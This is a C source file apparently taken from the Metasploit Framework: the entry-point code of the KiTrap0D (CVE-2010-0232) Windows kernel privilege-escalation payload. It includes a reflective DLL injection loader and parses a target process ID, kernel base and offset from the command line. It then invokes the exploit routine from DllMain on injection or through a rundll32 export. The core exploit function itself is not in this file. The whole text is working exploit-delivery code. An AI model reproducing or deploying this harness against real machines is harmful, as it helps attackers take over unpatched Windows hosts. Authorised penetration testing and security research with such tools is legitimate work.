GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
//
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
// not apply to the produced x64 dll.
//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"

#include <limits.h>
#include <stdlib.h>
#include "kitrap0d.h"
#include "../common/common.h"
/*!
 * @brief Parse a \c DWORD that follows a named switch on the command line.
 * @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
 * @param cpCommandLine Command line string to search (may be NULL).
 * @param cpCommand Switch prefix to look for, e.g. "/FOO:" (may be NULL).
 * @returns The value \c strtoul parses (base auto-detected, so "0x" hex and
 *          plain decimal both work) from the text directly after
 *          \c cpCommand, or 0 when either argument is NULL, the switch is
 *          absent, or no number follows it.
 */
DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)
{
	// Guard clauses instead of the do { ... } while (0) / break pattern.
	if (cpCommandLine == NULL || cpCommand == NULL) {
		return 0;
	}

	char * cpMatch = strstr(cpCommandLine, cpCommand);
	if (cpMatch == NULL) {
		return 0;
	}

	// Skip past the switch text itself; strtoul stops at the first character
	// that is not part of the number, so the rest of the command line does
	// not need to be split off first.
	return strtoul(cpMatch + strlen(cpCommand), NULL, 0);
}
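/*!
 * @brief Parse an \c int that follows a named switch on the command line.
 * @example elevator_command_int( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
 * @param cpCommandLine Command line string to search (may be NULL).
 * @param cpCommand Switch prefix to look for, e.g. "/FOO:" (may be NULL).
 * @returns The decimal value directly after \c cpCommand, clamped to
 *          [INT_MIN, INT_MAX] when the digits do not fit in an \c int;
 *          0 when either argument is NULL, the switch is absent, or no
 *          digits follow it.
 * @remark Uses \c strtol rather than \c atoi: \c atoi has undefined
 *         behaviour on an out-of-range value, whereas \c strtol saturates,
 *         so the result can be clamped instead of silently wrapping.
 */
int elevator_command_int(char * cpCommandLine, char * cpCommand)
{
	int iResult = 0;

	do
	{
		if (!cpCommandLine || !cpCommand) {
			break;
		}

		char * cpString = strstr(cpCommandLine, cpCommand);
		if (!cpString) {
			break;
		}

		cpString += strlen(cpCommand);

		// Base 10 matches atoi's behaviour; base 0 would also accept "0x...".
		long lValue = strtol(cpString, NULL, 10);

		// strtol returns LONG_MAX/LONG_MIN on overflow, so a range check
		// covers both the ERANGE case and a long wider than int.
		if (lValue > INT_MAX) {
			iResult = INT_MAX;
		} else if (lValue < INT_MIN) {
			iResult = INT_MIN;
		} else {
			iResult = (int)lValue;
		}
	} while (0);

	return iResult;
}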
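/*!
 * @brief The real entrypoint for this app.
 * @param cpCommandLine Pointer to the command line, expected to carry the
 *        /VDM_TARGET_PID:, /VDM_TARGET_KRN: and /VDM_TARGET_OFF: switches.
 * @remark Nothing is done when the command line is NULL or empty, or when
 *         the PID or kernel base switch is missing or zero. The offset is
 *         not checked, so a missing /VDM_TARGET_OFF: is passed on as 0.
 */
VOID elevator_main(char * cpCommandLine)
{
	// %p instead of a (DWORD) cast: the cast truncated the address in the
	// x64 build of this dll and only ever logged the low 32 bits.
	dprintf("[KITRAP0D] elevator_main. cpCommandLine=%p", (void *)cpCommandLine);

	if (!cpCommandLine || cpCommandLine[0] == '\0') {
		return;
	}

	dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);

	DWORD dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");
	DWORD dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");
	DWORD dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");

	// Both the target process and the kernel base are mandatory inputs.
	if (!dwProcessId || !dwKernelBase) {
		return;
	}

	dprintf("[KITRAP0D] Invoking exploit");
	elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);

	// ...we should never return here...
	dprintf("[KITRAP0D] This shouldn't happen");
}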
/*!
 * @brief rundll32.exe entry point.
 * @param hWnd Unused; supplied by rundll32.
 * @param hInstance Unused; supplied by rundll32.
 * @param lpszCmdLine Command line handed straight to elevator_main.
 * @param nCmdShow Unused; supplied by rundll32.
 * @remark Does not return to the caller: once elevator_main comes back the
 *         process is terminated with ERROR_SUCCESS.
 * @todo Remove this?
 */
VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)
{
	(void)hWnd;
	(void)hInstance;
	(void)nCmdShow;

	elevator_main(lpszCmdLine);

	// Only reached if elevator_main returned; end the process rather than
	// letting rundll32 continue.
	ExitProcess(ERROR_SUCCESS);
}
/*!
 * @brief DLL entry point.
 * @param hInstance Module handle; stored in the global hAppInstance on attach.
 * @param dwReason DLL_PROCESS_ATTACH or another DLL_* notification reason.
 * @param lpReserved On process attach, used as the command line when non-NULL.
 * @returns Always TRUE; no notification is ever rejected.
 * @remark If we have been injected via RDI, lpReserved will be our command line.
 */
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
	// Only process attach does any work; thread attach/detach and process
	// detach are deliberately no-ops, so a plain if replaces the switch.
	if (dwReason == DLL_PROCESS_ATTACH) {
		hAppInstance = hInstance;

		if (lpReserved) {
			elevator_main((char *)lpReserved);
		}
	}

	return TRUE;
}